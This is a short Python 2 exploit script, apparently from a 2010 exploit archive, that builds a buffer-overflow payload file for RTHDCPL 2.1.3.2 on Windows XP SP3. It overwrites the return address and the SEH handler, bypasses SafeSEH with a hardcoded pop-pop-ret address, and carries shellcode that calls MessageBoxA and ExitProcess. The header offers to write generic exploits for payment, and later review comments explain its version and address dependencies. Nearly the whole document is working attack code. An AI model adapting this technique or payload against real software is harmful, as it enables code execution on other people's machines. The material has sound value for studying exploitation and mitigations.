# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition
# SafeSEH bypass
# App. has classic buffer overflow vulnerability
# it can be triggered by passing a too long argument
# as a startup parameter. Shellcode can be run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)
# Ps. If you need a generic exploit ...
# (no hardcoded VAs), write it yourself ;) or 'donate few' $$$
# we will c0de it for You ^^
# Python 2 script: every f.write() below hands a str to a handle opened
# with "wb", and the last line is a print *statement*, so under Python 3
# this fails (TypeError on the first write, SyntaxError on the print).
# The output path is fixed; open() raises IOError if the directory is missing.
filepath = "C:\\ShellCode\\RTHDCPL 2.1.3.2 - Exploit.bin"
# NOTE: not wrapped in a with-block, so a failing write leaves the handle
# to be closed by the garbage collector rather than deterministically.
f = open(filepath, "wb")

f.write('A'*4)
f.write('\x5E') # pop esi
f.write('\x5E') # pop esi
f.write('\xC3') # ret
f.write('\x90') # nop

f.write('[BraniX]')
f.write('A'*448) # mock

f.write('\xEB\x06') # jmp +6
f.write('\x90') # nop
f.write('\x90') # nop

# NOTE(review): absolute address valid only for the exact build named in
# the file header; module rebasing / ASLR invalidates it, which is the
# mitigation this class of payload depends on being absent.
f.write('\x70\x01\xA5\x01') # pop; pop; ret; address

f.write('\x83\xC1\x0C') # add ecx, 0Ch
f.write('\x88\x01') # mov byte ptr [ecx], al
f.write('\x83\xE9\x08') # sub ecx, 08
f.write('\x50') # push eax
f.write('\x51') # push ecx
f.write('\x51') # push ecx
f.write('\x50') # push eax
# NOTE(review): fixed rel32 displacements below assume the target DLLs sit
# at one specific load address; the author's own note above says the same.
f.write('\xE8\xC5\x08\x27\x7E') # call user32.MessageBoxA

f.write('\x50') # push eax
f.write('\xE8\xE7\xCB\x6E\x7C') # call kernel32.ExitProcess

f.write('\xCC'*1500) # int 3's

f.close()

print "Done ..."